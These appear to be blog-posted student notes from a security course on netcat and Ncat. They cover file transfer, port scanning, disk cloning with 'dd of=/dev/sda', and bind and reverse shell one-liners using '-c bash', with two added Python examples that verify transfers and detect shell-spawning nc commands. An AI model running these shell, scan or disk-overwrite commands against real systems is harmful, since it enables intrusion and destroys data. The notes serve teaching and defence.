I. Functions of netcat
1. netcat (nc): the Swiss Army knife of network tools; cross-platform and exceptionally compact
(1) Listening mode/transmission mode
1. Connecting to mailboxes
ping pop.sina.com    (find the IP of the Sina mailbox)
nc -vn IP 110
Log in after connecting to the mailbox
POP by default requires base64:
Open a shell
Enter base64
Enter the characters
Press Ctrl+D to get the characters after transcoding
The SMTP mailbox does not require transcoding to base64
2. Connecting to Metasploit
nc -nv (Metasploit) IP 80
Send an HTTP request to get the web page information
(2) telnet/get banner information
(3) Transfer of text information
Two Kali machines are connected to one another.
A: nc -l -p port    (open and listen on the port; A acts as the server)
B: nc -nv IP port    (B acts as the client)
Can be used for remote electronic forensics
Modify the contents of the server as little as possible
ls -l | nc -nv IP port
nc -l -p port > ps.txt    (writes the remotely transmitted information to ps.txt)
ps aux | nc -nv IP port -q 1    (-q 1: wait 1 s after the command finishes, then exit)
(4) Transferring files/directories
Transfer files:
A: nc -lp port > 1.mp4    (receiving end)
B: nc -nv IP port < 1.mp4 -q 1    (sending end)
Or
A: nc -lp port < 1.mp4 -q 1    (sending end)
B: nc -nv IP port > 2.mp4    (receiving end)
Keep the file extension consistent on both ends
Transfer a directory:
A: tar -cvf - music/ | nc -lp port -q 1
B: nc -nv IP port | tar -xvf -
Idea: pack the directory into a stream on one end and unpack it on the other
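None of the transfers in (3) and (4) confirm that the bytes received are the bytes sent, which matters for the forensic use mentioned in (3). The following is an added example, not part of the original notes: a Python sketch of both ends of an nc-style transfer over loopback that hashes the stream on each side so the two digests can be compared. The function names and the loopback setup are assumptions made for the illustration.

```python
import hashlib
import socket
import threading

CHUNK = 65536

def receive(server: socket.socket, out: dict) -> None:
    """Receiving end (like `nc -lp port > file`): hash bytes as they arrive."""
    conn, _ = server.accept()
    digest, data = hashlib.sha256(), bytearray()
    with conn:
        while chunk := conn.recv(CHUNK):    # b"" means the sender closed
            digest.update(chunk)
            data.extend(chunk)
    out["sha256"], out["data"] = digest.hexdigest(), bytes(data)

def send(host: str, port: int, payload: bytes) -> str:
    """Sending end (like `nc -nv IP port < file`): returns the SHA-256 it sent."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(payload)
    return hashlib.sha256(payload).hexdigest()

def transfer_and_verify(payload: bytes) -> bool:
    """Run both ends on loopback and compare the two digests."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))           # port 0: the OS picks a free port
    server.listen(1)
    port = server.getsockname()[1]
    result: dict = {}
    t = threading.Thread(target=receive, args=(server, result), daemon=True)
    t.start()
    sent_digest = send("127.0.0.1", port, payload)
    t.join(timeout=10)
    server.close()
    # In a real transfer the sender's digest travels out-of-band (for example
    # read out or written in the case notes) and is compared by the examiner.
    return result.get("sha256") == sent_digest and result.get("data") == payload

if __name__ == "__main__":
    print(transfer_and_verify(b"constructed evidence bytes\n" * 1000))
```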
(5) Encrypted file transfer
A: nc -lp port | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4    (receiving end)
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv IP port -q 1    (sending end)
Idea: use the encryption function of the operating system; mcrypt needs to be installed
(6) Remote control Trojan
(7) Encrypt all traffic
(8) Streaming media server
A: cat 1.mp4 | nc -lp port
B: nc -nv IP port | mplayer -vo x11 -cache 3000 -
Idea: transfer the video stream and play it with the MPlayer player
MPlayer needs to be installed separately
(9) Remote clone of a hard drive
A: nc -lp port | dd of=/dev/sda
B: dd if=/dev/sda | nc IP port -q 1
(10) Port scan
nc -nvz IP 1-65535
Scan all open ports
Uses TCP ports by default
nc -nvzu IP 1-1024
Scan UDP ports
No scanner's results are completely accurate.
(11) Remote control (the side with -c bash is the controlled party)
Forward direction:
A: nc -lp 333 -c bash
B: nc -nv IP port
Reverse:
A: nc -lp port
B: nc -nv IP port -c bash
Note: Windows users change bash to cmd
Can be used as a system service, in writing viruses, and for remote control
II. Defects of netcat
1. nc lacks encryption and authentication capabilities
It transmits in clear text
2. The nc parameters differ between versions
III. Ncat introduction
1. Ncat compensates for netcat's defects
2. Ncat is included in the Nmap toolkit
3. Remote control
A: ncat -c bash --allow IP -vnl port --ssl    (controlled party)
B: ncat -nv IP port --ssl
The key is exchanged first, and the session is then encrypted with SSL
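The remote-control invocations in (11) and in the Ncat section all share one marker a defender can look for: nc or ncat started with an option that hands a program to the peer. The following is an added detection example, not part of the original notes: Python that inspects process command lines (constructed samples, as they might appear in process-creation logs) and reports what is spawned, whether the process listens or connects out, and whether --ssl is set. Because option meanings differ between nc builds, as noted under II, a hit is a lead to review; the option tables are assumptions covering traditional nc and Ncat.

```python
import shlex
from pathlib import PurePath

NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional"}
EXEC_LONG = {"--exec", "--sh-exec", "--lua-exec"}   # Ncat long options
# Short options that take a value (union over traditional nc and Ncat), so the
# letters after them in a cluster are data, not flags.
ARG_TAKING = set("gGimdoxpqsTw")

def inspect(cmdline):
    """Return a finding if this nc/ncat command line hands a program to the peer."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                      # unbalanced quotes in the log line
        return None
    if not argv or PurePath(argv[0]).name not in NC_NAMES:
        return None
    args, spawn, listen = argv[1:], None, False
    for i, tok in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if tok.startswith("--"):
            name, _, val = tok.partition("=")
            if name in EXEC_LONG and spawn is None:
                spawn = val or nxt
            listen = listen or name == "--listen"
        elif tok.startswith("-") and len(tok) > 1:
            for j, ch in enumerate(tok[1:], start=1):
                if ch in "ce":              # -c / -e: run a program on connect
                    spawn = spawn or tok[j + 1:] or nxt
                    break
                listen = listen or ch == "l"
                if ch in ARG_TAKING:
                    break
    if spawn is None:
        return None
    return {"spawns": spawn, "mode": "listen" if listen else "connect",
            "tls": "--ssl" in args}

# Constructed command lines (192.0.2.0/24 is a documentation range).
SAMPLE = [
    "nc -lp 333 -c bash",
    "nc -nv 192.0.2.10 333 -c bash",
    "ncat -c bash --allow 192.0.2.20 -vnl 333 --ssl",
    "nc -nvz 192.0.2.10 1-65535",
    "nc -lp 333",
    "tar -cvf - music/",
]

def scan(lines):
    """Return (command line, finding) pairs for the lines that match."""
    return [(line, f) for line in lines if (f := inspect(line))]
```

Note that the --ssl session in the third sample hides the traffic from network inspection, so the process command line is where this detection has to happen.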
These are student notes from the Safe Cattle class; to see this course or more practical information-security material, go to the Safe Cattle class.
This article is from the "11662938" blog, please be sure to keep this source http://11672938.blog.51cto.com/11662938/1980479
"Safe Cow Study Notes" Common tools: netcat